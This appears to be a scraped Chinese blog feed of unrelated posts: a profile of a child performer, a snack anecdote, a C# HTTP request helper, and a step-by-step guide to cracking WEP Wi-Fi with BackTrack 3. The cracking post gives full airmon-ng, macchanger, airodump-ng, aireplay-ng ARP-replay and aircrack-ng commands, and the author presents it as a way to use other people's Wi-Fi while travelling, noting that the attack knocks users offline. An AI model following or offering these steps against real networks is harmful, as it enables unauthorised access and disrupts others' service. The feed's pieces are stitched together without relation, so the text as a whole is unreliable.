姓名:林妙可
拼 音:limiaoke
描 述:小公主
生 日:2000年1月1日
现住地: 北京
籍 贯: 北京
民 族: 汉族
身 高:122厘米
体 重:20公斤
年龄:9岁
地 区: 大陆
国 籍: 中国
语 言:普通话
特 长:表演,唱歌,舞蹈,钢琴
职 业:影视演员
经历:2008奥运会开幕式《歌唱祖国》演唱者
]]>
]]>
下了个BT3(Back Track 3),上YouTube看了段破解WEP的视频。自己实现了一下,结果真的行了。wifi的WEP 加密真的很脆弱,不过以后看见wifi基本就可以上网囖。哈哈。
一、试验环境
1.需要一张支持在linux使用airodump ,aircrack 的无线网卡。网上很多资料,自己去找吧。
2.下载BT3 ISO 刻盘,然后从光盘启动进入 KDE BT 里面。
二、过程步骤:
1.在菜单栏的Internet 中找到 wireless assistant 并打开。里面可以看到附近的无线网络。看看有没有加密了网络。这里我只测试了WEP的加密。如果提示无找到网络,会自动关闭。需要从新检查一下你的无线网卡。
2. 接下来是开第一shell 开始输入命令啦:
1)输入 airmon-ng 返回 无线网卡列表,要看清楚哪张网卡哦!我这里是wifi0
2)airmon-ng stop wifi0
3) ifconfig wif0 down
4)macchanger -m 00:11:22:33:44:55 wifi0 修改网卡的mac地址
5)airmon-ng start wifi0 启动完成后会再次列出所有的无线网卡。有写网卡会提示继承父级的驱动。估计这里的意思是,BT3自带了破解的驱动吧。呵呵..
6)设置网卡ko了,就开始airodump啦!
输入 airodump-ng wifi0 ,成功后会出现一个列表,而且不断的有pack进出。如果无返回这个列表,就需要改一下,看看刚才上面arimon-ng列出来的网卡。然后换一个网卡来dump。我这里是 airodump-ng ath1. 列表如果出来,就按 ctrl+C 停止。然后找到你要破解的网络的BSSID并且copy下来,还有要看清楚他的channel 和essid.
7) airodump-ng -c 要破解的channel -w wep123 --bssid 粘贴刚刚的BSSID
这里的wep123是随便输入的,后面需要用的哦。
3. 再开一个Shell输入:
1) aireplay-ng -1 -0 -a 粘贴刚刚的BSSID -h 00:11:22:33:44:55 -e 要破解的essid ath1
回车后,会返回一段东西里面有success的字样。具体是什么没太留意啦。就直接下一步了。也不知道失败是返回什么了。
2) airepaly-ng -3 -b 粘贴刚刚的BSSID -h 00:11:22:33:44:55 ath1
这里就直接arp了整个wifi网络。在wifi里面的人估计就上不了网了。所以接下来要速度点。如果里面的没人..那我就不知道会怎么样了。哈哈.因为需要截取一定量的数据包才能破解出密码。
4. 再开一个shell输入:
aircrack-ng -n 64 0b 粘贴刚刚的BSSID wep123_01.cap
这里不要这么快按回车,有两个地方需要注意的。第一是wep123_01.cap,需要确认一下名称,去home目录看看是不是这个名字。第二看看第一个shell窗口的数据包是否过W。如果都ko了,就按回车看结果吧。
key found: 后面这些就是密码啦。
三. 总结一下
WEP真的非常脆弱,但相信国内大多数wifi用的都是WEP啦。特别是家庭里面用的。下次要实现一下WPA 和 WPA-PSK 这两个环境的破解。BT3 是国外一个非常牛B的crack OS,里面集成大量的 hack tools。当出差或者去旅行的时候,最好带上一个网卡和BT3光盘。一定会有所收获的。呵呵..
另外,前段时间在武汉机场深圳机场都看到有中国电信的wifi网络。中国电信wifi是相对安全的。他不是加密的wifi。而是先让你连进wifi分配了一个公网IP给你。但是当你的数据要出去的时候,他会redirected到一个登陆页面输入帐户密码。所以.... 别想无线城的wifi了。不过估计奥运有外国hacker 想到办法破解到电信这个wifi系统的啦。
加个IPW2200的方法:http://backtrack.offensive-security.com/index.php/HCL:Wireless#IPW2200
]]>
程序代码 程序代码 程序代码 程序代码平常都是要早餐才有薯饼吃,今次竟然可以在吃宵夜的时候吃到薯饼。哈哈..
后面有个钟证明嘎. 哈哈
]]>
1: /// <summary>
2: /// 通用获取数据POST+GET
3: /// </summary>
4: /// <param name="url"></param>
5: /// <param name="postData"></param>
6: /// <param name="enc"></param>
7: /// <param name="cookie"></param>
8: /// <returns></returns>
9: private static string PGetHtml(string url, string postData, Encoding enc, CookieContainer cookie)
10: {
11: //返回的html
12: string html = String.Empty;
13:
14: bool m_UsePost = true;
15:
16: if (postData == null || postData.Length == 0)
17: m_UsePost = false;
18:
19: try
20: {
21: HttpWebRequest req = (HttpWebRequest)WebRequest.Create(url);
22: req.UserAgent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; Maxthon; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Alexa Toolbar)";
23: req.Method = m_UsePost ? "POST" : "GET";
24: req.Referer = url;
25: req.ContentType = "application/x-www-form-urlencoded";
26: req.KeepAlive = true;
27: req.Accept = "*/*";
28:
29: if (cookie != null)
30: {
31: req.CookieContainer = cookie;
32: }
33:
34: if (m_UsePost)
35: {
36: req.ContentLength = postData.Length;
37: using (StreamWriter writer = new StreamWriter(req.GetRequestStream()))
38: {
39: writer.Write(postData);
40: writer.Close();
41: }
42: }
43:
44: HttpWebResponse resp = (HttpWebResponse)req.GetResponse();
45: if (cookie != null)
46: {
47: resp.Cookies = cookie.GetCookies(new Uri(url));
48: }
49:
50:
51: StreamReader sr = new StreamReader(resp.GetResponseStream(), enc);
52: html = sr.ReadToEnd();
53: sr.Close();
54: resp.Close();
55: }
56: catch (Exception ex)
57: {
58: html = ex.ToString();
59: }
60:
61: return html;
62: }
]]>